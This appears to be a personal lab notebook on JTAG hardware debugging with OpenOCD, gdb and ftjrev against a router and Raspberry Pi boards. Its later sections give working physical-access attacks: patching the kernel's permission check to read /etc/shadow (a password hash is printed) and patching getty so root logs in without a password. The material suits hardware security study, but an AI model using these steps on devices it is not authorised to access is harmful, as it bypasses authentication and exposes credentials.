JTAG
JTAG (IEEE 1149.1)¶
Finding the Pins¶
Pin Info:
- TDI: Serial Test data input of the boundary scan link
- TDO: Serial Test data output of the boundary scan link
- TMS: Test mode select for the state machine
- TCK: Test clock to synchronize stat machine operations
- TRST: JTAG Reset for the TAP controller's state machine
Using Shikra¶
Pinout:
- TCK: 1
- TDI: 2
- TDO: 3
- TMS: 4
- GND: 18
Shikra Config:
>>> cat /usr/share/openocd/scripts/interface/shikra.cfg
#shikra.cfg
adapter driver ftdi
ftdi_vid_pid 0x0403 0x6014
ftdi_layout_init 0x0c08 0x0f1b
adapter speed 2000
#end shikra.cfg
OpenOcd Raspi config:
# Raspberry Pi 4
telnet_port 4444
gdb_port 3333
transport select jtag
adapter speed 125
jtag_ntrst_delay 500
reset_config trst_only trst_open_drain
gdb_breakpoint_override hard
if { [info exists CHIPNAME] } {
set _CHIPNAME $CHIPNAME
} else {
set _CHIPNAME bcm2711
}
if { [info exists DAP_TAPID] } {
set _DAP_TAPID $DAP_TAPID
} else {
set _DAP_TAPID 0x4ba00477
}
jtag newtap $_CHIPNAME tap -irlen 4 -ircapture 0x1 -irmask 0xf -expected-id $_DAP_TAPID -enable
dap create $_CHIPNAME.dap -chain-position $_CHIPNAME.tap
set _TARGETNAME $_CHIPNAME.a72
set _CTINAME $_CHIPNAME.cti
set DBGBASE {0x80410000 0x80510000 0x80610000 0x80710000}
set CTIBASE {0x80420000 0x80520000 0x80620000 0x80720000}
set _cores 4
for { set _core 0 } { $_core < $_cores } { incr _core } {
cti create $_CTINAME.$_core -dap $_CHIPNAME.dap -ap-num 0 \
-baseaddr [lindex $CTIBASE $_core]
target create $_TARGETNAME.$_core aarch64 \
-dap $_CHIPNAME.dap -coreid $_core \
-dbgbase [lindex $DBGBASE $_core] -cti $_CTINAME.$_core
$_TARGETNAME.$_core configure -event gdb-attach { halt }
}
# Uncomment below to use SMP
#target smp $_TARGETNAME.0 $_TARGETNAME.1 $_TARGETNAME.2 $_TARGETNAME.3
#targets $_TARGETNAME.0
Use OpenOCD with Shikra:
>>> sudo openocd -f /usr/share/openocd/scripts/interface/shikra.cfg -f /usr/share/openocd/scripts/target/at91sam7x512.cfg
Open On-Chip Debugger 0.10.0
Licensed under GNU GPL v2
For bug reports, read
http://openocd.org/doc/doxygen/bugs.html
adapter speed: 2000 kHz
srst_only srst_pulls_trst srst_gates_jtag srst_open_drain connect_deassert_srst
Info : auto-selecting first available session transport "jtag". To override use 'transport select <transport>'.
Info : clock speed 2000 kHz
Error: JTAG scan chain interrogation failed: all ones
Error: Check JTAG interface, timings, target power, etc.
Error: Trying to use configured scan chain anyway...
Error: sam7x512.cpu: IR capture error; saw 0x0f not 0x01
Warn : Bypassing JTAG setup events due to errors
Info : Embedded ICE version 15
Error: unknown EmbeddedICE version (comms ctrl: 0xffffffff)
Info : sam7x512.cpu: hardware has 2 breakpoint/watchpoint units
Warn : ThumbEE -- incomplete support
Info : accepting 'telnet' connection on tcp/4444
Using Tigard¶
Tigard Config:
>>> cat /usr/share/openocd/scripts/interface/tigard.cfg
interface ftdi
ftdi_vid_pid 0x0403 0x6010
ftdi_channel 1
adapter speed 2000
ftdi_layout_init 0x0078 0x017b
ftdi_layout_signal nTRST -ndata 0x0010 -noe 0x0040
ftdi_layout_signal nSRST -ndata 0x0020 -noe 0x0040
transport select jtag
OCD Router Experiment¶
Running OCD on Router:
>>> openocd -f tigard-jtag.cfg -f mt7620n.cfg
Open On-Chip Debugger 0.11.0
Licensed under GNU GPL v2
For bug reports, read
http://openocd.org/doc/doxygen/bugs.html
jtag
mt7620.cpu
Info : Listening on port 6666 for tcl connections
Info : Listening on port 4444 for telnet connections
Info : clock speed 2000 kHz
Info : JTAG tap: mt7620.cpu tap/device found: 0x1635224f (mfg: 0x127 (MIPS Technologies), part: 0x6352, ver: 0x1)
Info : starting gdb server for mt7620.cpu on 3333
Info : Listening on port 3333 for gdb connections
Connect to OCD on Router:
>>> telnet localhost 4444
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
> halt
MIPS32 with MIPS16 support implemented
target halted in MIPS32 mode due to debug-request, pc: 0x80011090
> step
target halted in MIPS32 mode due to single-step, pc: 0x80011094
> reg
===== mips32 registers
(0) r0 (/32): 0x00000000
(1) r1 (/32): 0x00000000
(2) r2 (/32): 0x1100a401
(3) r3 (/32): 0x00000000
(4) r4 (/32): 0x00000000
(5) r5 (/32): 0x01000000
(6) r6 (/32): 0x1100a400
(7) r7 (/32): 0xffff00fe
(8) r8 (/32): 0x802f9fe0
(9) r9 (/32): 0x0000a400
(10) r10 (/32): 0x000f4240
(11) r11 (/32): 0x00000000
(12) r12 (/32): 0x00000035
(13) r13 (/32): 0x777eb3a0
(14) r14 (/32): 0x000003e8
(15) r15 (/32): 0x7789e000
(16) r16 (/32): 0x80300000
(17) r17 (/32): 0x00000001
(18) r18 (/32): 0x802aa744
(19) r19 (/32): 0x00000001
(20) r20 (/32): 0x83fe0000
(21) r21 (/32): 0x00000000
(22) r22 (/32): 0x83fe0000
(23) r23 (/32): 0x00000000
(24) r24 (/32): 0x000003e8
(25) r25 (/32): 0x8001107c
(26) r26 (/32): 0x802f9eb8
(27) r27 (/32): 0x802f9eb8
(28) r28 (/32): 0x802f8000
(29) r29 (/32): 0x802f9eb8
(30) r30 (/32): 0x83fe0000
(31) r31 (/32): 0x80043540
(32) status (/32): 0x1100a401
(33) lo (/32): 0x402da580
(34) hi (/32): 0x00000035
(35) badvaddr (/32): 0x777e3468
(36) cause (/32): 0xd0808000
(37) pc (/32): 0x80043500
(38) f0 (/32): 0x00000000
(39) f1 (/32): 0x00000000
(40) f2 (/32): 0x00000000
(41) f3 (/32): 0x00000000
(42) f4 (/32): 0x00000000
(43) f5 (/32): 0x00000000
(44) f6 (/32): 0x00000000
(45) f7 (/32): 0x00000000
(46) f8 (/32): 0x00000000
(47) f9 (/32): 0x00000000
(48) f10 (/32): 0x00000000
(49) f11 (/32): 0x00000000
(50) f12 (/32): 0x00000000
(51) f13 (/32): 0x00000000
(52) f14 (/32): 0x00000000
(53) f15 (/32): 0x00000000
(54) f16 (/32): 0x00000000
(55) f17 (/32): 0x00000000
(56) f18 (/32): 0x00000000
(57) f19 (/32): 0x00000000
(58) f20 (/32): 0x00000000
(59) f21 (/32): 0x00000000
(60) f22 (/32): 0x00000000
(61) f23 (/32): 0x00000000
(62) f24 (/32): 0x00000000
(63) f25 (/32): 0x00000000
(64) f26 (/32): 0x00000000
(65) f27 (/32): 0x00000000
(66) f28 (/32): 0x00000000
(67) f29 (/32): 0x00000000
(68) f30 (/32): 0x00000000
(69) f31 (/32): 0x00000000
(70) fcsr (/32): 0x00000000
(71) fir (/32): 0x00000000
Read Memory from openocd:
>>> telnet localhost 4444
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
> halt
> mem2arrat tcl_varable_name 32 0xd0000000 0x1000
invalid command name "mem2arrat"
> mem2array tcl_varable_name 32 0xd0000000 0x1000
mem2array: Read @ 0xd0000000, w=4, cnt=1024, failed
> mem2array tcl_varable_name 32 0x00000000 0x1000
mem2array: Read @ 0x00000000, w=4, cnt=1024, failed
> mem2array tcl_varable_name 32 0x00000000 0x100
mem2array: Read @ 0x00000000, w=4, cnt=256, failed
> dump_image mydump.bin 0x80000000 0x2000000
GDB Router Experiment¶
$gdb-multiarch
GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) set architecture mips
The target architecture is set to "mips".
(gdb) target extended-remote localhost:3333
Remote debugging using localhost:3333
warning: No executable has been specified and target does not support
determining executable automatically. Try using the "file" command.
0xff200208 in ?? ()
(gdb) res
(gdb) i r
zero at v0 v1 a0 a1 a2 a3
R0 00000000 00000001 ec4e4000 000000c0 00026cbb 0002ee00 00000000 0000039b
t0 t1 t2 t3 t4 t5 t6 t7
R8 0000002e 676e6974 206e6920 65732033 00000000 777eb3a0 00000000 64692065
s0 s1 s2 s3 s4 s5 s6 s7
R16 00000960 00000001 00000a28 80340000 00000047 80340000 80340000 000003e8
t8 t9 k0 k1 gp sp s8 ra
R24 00000003 8017ff5c 802f9c18 802f9c18 802f8000 802f9c80 83fe0000 8002407c
status lo hi badvaddr cause pc
1100a400 11aa0000 0000039b ff2001fc 50808000 8013e560
fcsr fir
00000000 00000000
(gdb) cont
Continuing.
^C
Program received signal SIGINT, Interrupt.
0x8013e560 in ?? (warning: GDB can't find the start of the function at 0x8013e560.
GDB is unable to find the start of the function at 0x8013e560
and thus can't determine the size of that function's stack frame.
This means that GDB may be unable to access that stack frame, or
the frames below it.
This problem is most likely caused by an invalid program counter or
stack pointer.
However, if you think GDB should simply search farther back
from 0x8013e560 for code which looks like the beginning of a
function, you can increase the range of the search using the `set
heuristic-fence-post' command.
)
(gdb) x/10w $pc
0x8013e560: 343998463 612696063 65011720 0
0x8013e570: 1006796848 -1941722000 1006764038 876776892
0x8013e580: 6422553 4114
(gdb) x/10i $pc
=> 0x8013e560: bnez a0,0x8013e560
0x8013e564: addiu a0,a0,-1
0x8013e568: jr ra
0x8013e56c: nop
0x8013e570: lui v0,0x8030
0x8013e574: lw v1,-21392(v0)
0x8013e578: lui v0,0x6
0x8013e57c: ori v0,v0,0x8dbc
0x8013e580: multu v1,v0
0x8013e584: mflo v0
Privilege Escalation¶
Finding the Kernel Boot args:
find 00000000, FFFFFFFF, "console"
Patching Boot Args:
telnet localhost 4444
#Halt CPU
> halt
# Read Memory at Address
> mdw 0x8020dcc8
# Write data to memory
> mww 0x8020dcc8 0xffffffff
# Read Memory at Address
> mdw 0x8020dcc8
# Create Watch Point and resume CPU execution
> wp 0x8020dcc8 4; resume
# When the Watch Point is triggered remove the watchpoint
# Step to the next instruction so that the data is written.
# Show the Written data
> rwp 0x8020dcc8; step; mdw 0x8020dcc8
# Write the new boot args to the memory address
> mww 0x8020dcc8 0x324d2031
# Check that it is written correctly
> mdw 0x8020dcc8
# Resume the CPU
> resume
Patching Kernel Memory MIPS¶
We are patching kernel memory so that the generic_permission function that checks if a user has permissions to readn or write a file does not return a Access Error. This allow us to operate as root with out the permissions
Find the generic_permission function:
user@OpenWrt:~$ cat /proc/kallsyms | grep generic_permission
800a8a38 T generic_permission
GDB memory info:
(gdb) x/200i 0x800a8a38
[...]
0x800a8ad4: li v0,-13
0x800a8ad8: andi s2,s2,0x1
0x800a8adc: beqz s2,0x800a8b00
0x800a8ae0: andi v0,v0,0x49
0x800a8ae4: bnez v0,0x800a8b04
0x800a8ae8: move a0,s0
0x800a8aec: li v0,4
[...]
0x800a8b2c: li v0,-13
0x800a8b30: lw ra,36(sp)
0x800a8b34: lw s3,32(sp)
0x800a8b38: lw s2,28(sp)
0x800a8b3c: lw s1,24(sp)
0x800a8b40: lw s0,20(sp)
0x800a8b44: jr ra
Break on E_Access (-13) Load instructions:
# 0x800a8ad4: li v0,-13
# 0x800a8afc: li v0,-13
# 0x800a8b2c: li v0,-13
(gdb) break *0x800a8ad4
warning: Breakpoint address adjusted from 0xffffffff800a8ad4 to 0xffffffff800a8ad0.
Breakpoint 2 at 0x800a8ad0
(gdb) break *0x800a8afc
warning: Breakpoint address adjusted from 0xffffffff800a8afc to 0xffffffff800a8af8.
Breakpoint 3 at 0x800a8af8
(gdb) break *0x800a8b2c
Breakpoint 4 at 0x800a8b2c
Trigger the E_Access Error:
user@OpenWrt:~$ cat /etc/shadow
Modify the generic_permission function Memory:
telnet localhost 4444
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
accepting 'gdb' connection on tcp/3333
MIPS32 with MIPS16 support implemented
target halted in MIPS32 mode due to debug-request, pc: 0x80011090
# 0x00000000 is NOP in MIPS
> mww 0x800a8ad4 0x00000000
> mww 0x800a8b2c 0x00000000
Check with GDB:
(gdb) x/5i 0x800a8ad4
0x800a8ad4: nop
0x800a8ad8: andi s2,s2,0x1
0x800a8adc: beqz s2,0x800a8b00
0x800a8ae0: andi v0,v0,0x49
0x800a8ae4: bnez v0,0x800a8b04
0x800a8ae8: move a0,s0
gdb) x/5i 0x800a8b2c
0x800a8b2c: nop
0x800a8b30: lw ra,36(sp)
0x800a8b34: lw s3,32(sp)
0x800a8b38: lw s2,28(sp)
0x800a8b3c: lw s1,24(sp)
Patching Kernel Memory ARM¶
We are patching kernel memory so that the generic_permission function that checks if a user has permissions to readn or write a file does not return a Access Error. This allow us to operate as root with out the permissions
Find the generic_permission function:
pi@raspberrypi:~$ sudo cat /proc/kallsyms | grep generic_permission
c0136dd4 T generic_permission
c0712514 R __ksymtab_generic_permission
c071dc94 r __kcrctab_generic_permission
c0729124 r __kstrtab_generic_permission
Use GDB to find the -13:
$gdb-multiarch
GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb) set architecture armv7
The target architecture is set to "armv7".
(gdb) target extended-remote localhost:3333
Remote debugging using localhost:3333
(gdb) x/200i 0xc0136dd4
0xc0136dd4: mov r12, sp
0xc0136dd8: push {r3, r4, r5, r6, r7, r8, r11, r12, lr, pc}
0xc0136ddc: sub r11, r12, #4
0xc0136de0: push {lr} ; (str lr, [sp, #-4]!)
0xc0136de4: ldmfd sp!, {lr}
0xc0136de8: mov r3, sp
0xc0136dec: bic r3, r3, #8128 ; 0x1fc0
0xc0136df0: bic r3, r3, #63 ; 0x3f
[...]
0xc0136eb0: mvn r0, #12
0xc0136eb4: ldm sp, {r3, r4, r5, r6, r7, r8, r11, sp, pc}
Set the Breakpoints:
(gdb) break *0xC0136EB0
Breakpoint 9 at 0xc0136eb0
(gdb) c
Continuing.
Breakpoint 9, 0xc0136eb0 in ?? ()
(gdb) info reg $r0
r0 0x0 0
(gdb) x/10i $pc
=> 0xc0136eb0: mvn r0, #12
0xc0136eb4: ldm sp, {r3, r4, r5, r6, r7, r8, r11, sp, pc}
0xc0136eb8: mov r0, r5
0xc0136ebc: mov r1, #1
0xc0136ec0: bl 0xc00296f4
0xc0136ec4: cmp r0, #0
0xc0136ec8: bne 0xc0136e28
0xc0136ecc: tst r6, #2
0xc0136ed0: beq 0xc0136e9c
0xc0136ed4: b 0xc0136eb0
(gdb) nexti
0xc0136eb4 in ?? ()
(gdb) x/10i $pc
=> 0xc0136eb4: ldm sp, {r3, r4, r5, r6, r7, r8, r11, sp, pc}
0xc0136eb8: mov r0, r5
0xc0136ebc: mov r1, #1
0xc0136ec0: bl 0xc00296f4
0xc0136ec4: cmp r0, #0
0xc0136ec8: bne 0xc0136e28
0xc0136ecc: tst r6, #2
0xc0136ed0: beq 0xc0136e9c
0xc0136ed4: b 0xc0136eb0
0xc0136ed8: tst r6, #128 ; 0x80
(gdb) info reg $r0
r0 0xfffffff3 4294967283
(gdb)
Test Register Change:
(gdb) set $r0=0
(gdb) info reg $r0
r0 0x0 0
Trigger the E_Access Error:
user@OpenWrt:~$ cat /etc/shadow
Modify the generic_permission function Memory:
telnet localhost 4444
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
accepting 'gdb' connection on tcp/3333
MIPS32 with MIPS16 support implemented
target halted in MIPS32 mode due to debug-request, pc: 0x80011090
# 0x00f020e3 is NOP in ARM
# There is a bug with writing more than one byte at a time
> mwb 0xc0136eb0 0x00
> mwb 0xc0136eb1 0xf0
> mwb 0xc0136eb2 0x20
> mwb 0xc0136eb3 0xe3
> mdw 0xc0136eb0
0xc0136eb0: e320f000
Check with GDB:
(gdb) x/10i 0xc0136eb0
0xc0136eb0: nop {0}
0xc0136eb4: ldm sp, {r3, r4, r5, r6, r7, r8, r11, sp, pc}
0xc0136eb8: mov r0, r5
0xc0136ebc: mov r1, #1
0xc0136ec0: bl 0xc00296f4
0xc0136ec4: cmp r0, #0
0xc0136ec8: bne 0xc0136e28
0xc0136ecc: tst r6, #2
0xc0136ed0: beq 0xc0136e9c
0xc0136ed4: b 0xc0136eb0
Do the Test:
pi@raspberrypi:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
pi@raspberrypi:~$ cat /etc/shadow
root:*:16948:0:99999:7:::
daemon:*:16948:0:99999:7:::
bin:*:16948:0:99999:7:::
sys:*:16948:0:99999:7:::
sync:*:16948:0:99999:7:::
games:*:16948:0:99999:7:::
man:*:16948:0:99999:7:::
lp:*:16948:0:99999:7:::
mail:*:16948:0:99999:7:::
news:*:16948:0:99999:7:::
uucp:*:16948:0:99999:7:::
proxy:*:16948:0:99999:7:::
www-data:*:16948:0:99999:7:::
backup:*:16948:0:99999:7:::
list:*:16948:0:99999:7:::
irc:*:16948:0:99999:7:::
gnats:*:16948:0:99999:7:::
nobody:*:16948:0:99999:7:::
systemd-timesync:*:16948:0:99999:7:::
systemd-network:*:16948:0:99999:7:::
systemd-resolve:*:16948:0:99999:7:::
systemd-bus-proxy:*:16948:0:99999:7:::
pi:$6$X8NLlS0p$2S1FocpEf70CQkDf/fo6DjBo6/2qAQh4hi1ZnaQ8xLZMNEAOf/VAoiuGOspW/v6CpNvJr.SL5m6EM6yPwQIgq/:16948:0:99999:7:::
messagebus:*:16948:0:99999:7:::
avahi:*:16948:0:99999:7:::
ntp:*:16948:0:99999:7:::
sshd:*:16948:0:99999:7:::
statd:*:16948:0:99999:7:::
lightdm:*:16948:0:99999:7:::
pulse:*:16948:0:99999:7:::
rtkit:*:16948:0:99999:7:::
Patching Program Memory ARM¶
We are patching the getty process to make it run login -f username instead of login -- username. The -f flag is used to skip login authentication. This allows someone with a login prompt to login without knowing the password.
Find the offsets to the "--" string:
pi@raspberrypi:~$ xxd /sbin/getty | grep "\-\-"
[...]
0006b40: 2d66 0000 2d2d 0000 2573 3a20 6361 6e27 -f..--..%s: can'
Using my Find and Replace Script:
$python ocd_mem_find_replace.py -f "2d66 0000 2d2d 0000" -r "2d66 0000 2d66 0000" -o 0x6b40 -s 0xd0000000
{5: '0x66'}
Starting Scanning Range 0xd0000000 - 0xd1000000
Starting Scanning Range 0xd1000000 - 0xd2000000
Starting Scanning Range 0xd2000000 - 0xd3000000
Starting Scanning Range 0xd3000000 - 0xd4000000
Starting Scanning Range 0xd4000000 - 0xd5000000
Starting Scanning Range 0xd5000000 - 0xd6000000
Starting Scanning Range 0xd6000000 - 0xd7000000
Found Partial Match at 0xd6cf9b40: 0000662d
Found Partial Match at 0xd6cf9b44: 00002d2d
Found Match at 0xd6cf9b40: ['0000662d', '00002d2d']
Paching Address 0xd6cf9b40: 00002d2d -> 2d66 0000 2d66 0000
mwb phys 0xD6CF9B45 0x66
Resuming the Process
Login without Password:
Raspbian GNU/Linux 8 raspberrypi ttyAMA0
raspberrypi login: root
Last login: Sun Jul 24 15:29:32 UTC 2016 on ttyAMA0
Linux raspberrypi 4.4.13+ #894 Mon Jun 13 12:43:26 BST 2016 armv6l
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@raspberrypi:~#
Using Openocd¶
Finding Number of taps:
>>> sudo openocd -f /usr/share/openocd/scripts/interface/ftdi/tigard-jtag.cfg
Open On-Chip Debugger 0.11.0-rc1+dev-00015-gd4bf20756-dirty (2021-01-13-00:58)
Licensed under GNU GPL v2
For bug reports, read
http://openocd.org/doc/doxygen/bugs.html
jtag
Info : Listening on port 6666 for tcl connections
Info : Listening on port 4444 for telnet connections
Info : clock speed 2000 kHz
Warn : There are no enabled taps. AUTO PROBING MIGHT NOT WORK!!
Info : JTAG tap: auto0.tap tap/device found: 0x4ba00477 (mfg: 0x23b (ARM Ltd), part: 0xba00, ver: 0x4)
Warn : AUTO auto0.tap - use "jtag newtap auto0 tap -irlen 4 -expected-id 0x4ba00477"
Warn : gdb services need one or more targets defined
Connecting to the Telnet Console:
>>> telnet localhost 4444
Trying ::1...
Connection failed: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
> reset halt
Can't assert SRST: nSRST signal is not defined
JTAG scan chain interrogation failed: all ones
Check JTAG interface, timings, target power, etc.
Trying to use configured scan chain anyway...
sam7x512.cpu: IR capture error; saw 0x0f not 0x01
Bypassing JTAG setup events due to errors
Can't assert SRST: nSRST signal is not defined
ThumbEE -- incomplete support
target halted in ThumbEE state due to watchpoint, current mode: System
cpsr: 0xffffffff pc: 0xfffffff9
srst pulls trst - can not reset into halted mode. Issuing halt after reset.
NOTE! DCC downloads have not been enabled, defaulting to slow memory writes. Type 'help dcc'.
NOTE! Severe performance degradation without fast memory access enabled. Type 'help fast'.
> dump_image dump_proxmark3.pin 0x100000 0x100000
dumped 1048576 bytes in 15.351289s (66.704 KiB/s)
> reg
> flash info 0
> flash list
> flash banks
CPU Commands:
#Halt the CPU
> reset halt
#Show Registers
> reg
#Resume the CPU
> reset run
Memory Commands:
#Get Memory Information
> flash info 0
> flash list
> flash banks
#Dump Memory
> dump_image raspi_kern_c0.bin 0xc0000000 0x01000000
#Erase Memory
> flash write_image erase "Desktop/FirstApp.hex"
Using ftjrev¶
Scanning for Clocks:
$ ./ftjrev clocks
Found 3 devices with total IR length of 26
Device 0: IDCODE 2295C093 (XC5VLX330-FFG1760)
Device 1: IDCODE 21C2E093 (XC3S1200E-FT256)
Device 2: IDCODE 2295C093 (XC5VLX330-FFG1760)
Total boundary scan chain: 8572
Clock pass...
CLOCK: 0[XC5VLX330-FFG1760]:IO_AN14
CLOCK: 0[XC5VLX330-FFG1760]:IO_J13
CLOCK: 0[XC5VLX330-FFG1760]:IO_K13
CLOCK: 1[XC3S1200E-FT256]:IPAD78
CLOCK: 1[XC3S1200E-FT256]:K2
CLOCK: 1[XC3S1200E-FT256]:IPAD258
CLOCK: 1[XC3S1200E-FT256]:L8
CLOCK: 2[XC5VLX330-FFG1760]:IO_AM13
CLOCK: 2[XC5VLX330-FFG1760]:IO_J30
CLOCK: 2[XC5VLX330-FFG1760]:IO_P37
Scanning for Devices:
$ ./ftjrev scan
Found 3 devices with total IR length of 26
Device 0: IDCODE 2295C093 (XC5VLX330-FFG1760)
Device 1: IDCODE 21C2E093 (XC3S1200E-FT256)
Device 2: IDCODE 2295C093 (XC5VLX330-FFG1760)
Total boundary scan chain: 8572
Clock pass...
CLOCK: 0[XC5VLX330-FFG1760]:IO_AN14
CLOCK: 0[XC5VLX330-FFG1760]:IO_J13
CLOCK: 0[XC5VLX330-FFG1760]:IO_K13
CLOCK: 1[XC3S1200E-FT256]:IPAD78
CLOCK: 1[XC3S1200E-FT256]:K2
CLOCK: 1[XC3S1200E-FT256]:IPAD258
CLOCK: 1[XC3S1200E-FT256]:L8
CLOCK: 2[XC5VLX330-FFG1760]:IO_AM13
CLOCK: 2[XC5VLX330-FFG1760]:IO_J30
CLOCK: 2[XC5VLX330-FFG1760]:IO_P37
Pin pass...
0[XC5VLX330-FFG1760]:IO_BB13 --> 2[XC5VLX330-FFG1760]:IO_AT16
0[XC5VLX330-FFG1760]:IO_AY12 --> 2[XC5VLX330-FFG1760]:IO_AW17
0[XC5VLX330-FFG1760]:IO_AY13 --> 2[XC5VLX330-FFG1760]:IO_AT20
0[XC5VLX330-FFG1760]:IO_BA11 --> 2[XC5VLX330-FFG1760]:IO_AT19
0[XC5VLX330-FFG1760]:IO_BB11 --> 2[XC5VLX330-FFG1760]:IO_AT17
0[XC5VLX330-FFG1760]:IO_BB12 --> 2[XC5VLX330-FFG1760]:IO_AU16
0[XC5VLX330-FFG1760]:IO_AW12 --> 2[XC5VLX330-FFG1760]:IO_AW18
0[XC5VLX330-FFG1760]:IO_AW11 --> 2[XC5VLX330-FFG1760]:IO_AV35
Scanning for Input Pins:
$ ./ftjrev iprobe
Found 3 devices with total IR length of 26
Device 0: IDCODE 2295C093 (XC5VLX330-FFG1760)
Device 1: IDCODE 21C2E093 (XC3S1200E-FT256)
Device 2: IDCODE 2295C093 (XC5VLX330-FFG1760)
Total boundary scan chain: 8572
Clock pass...
CLOCK: 0[XC5VLX330-FFG1760]:IO_AN14
CLOCK: 0[XC5VLX330-FFG1760]:IO_J13
CLOCK: 0[XC5VLX330-FFG1760]:IO_K13
CLOCK: 1[XC3S1200E-FT256]:IPAD78
CLOCK: 1[XC3S1200E-FT256]:K2
CLOCK: 1[XC3S1200E-FT256]:IPAD258
CLOCK: 1[XC3S1200E-FT256]:L8
CLOCK: 2[XC5VLX330-FFG1760]:IO_AM13
CLOCK: 2[XC5VLX330-FFG1760]:IO_J30
CLOCK: 2[XC5VLX330-FFG1760]:IO_P37
Probing inputs, press ctrl+c to stop...
0[XC5VLX330-FFG1760]:IO_K20
0[XC5VLX330-FFG1760]:IO_K20
0[XC5VLX330-FFG1760]:IO_K20
0[XC5VLX330-FFG1760]:IO_K20
0[XC5VLX330-FFG1760]:IO_K20
0[XC5VLX330-FFG1760]:IO_K20
Scanning for Output Pins:
$ stty -F /dev/ttyUSB2 speed 115200
$ ./ftjrev oprobe > /dev/ttyUSB2
Found 3 devices with total IR length of 26
Device 0: IDCODE 2295C093 (XC5VLX330-FFG1760)
Device 1: IDCODE 21C2E093 (XC3S1200E-FT256)
Device 2: IDCODE 2295C093 (XC5VLX330-FFG1760)
Total boundary scan chain: 8572
Clock pass...
Probing outputs, press ctrl+c to stop...
halt
resume
step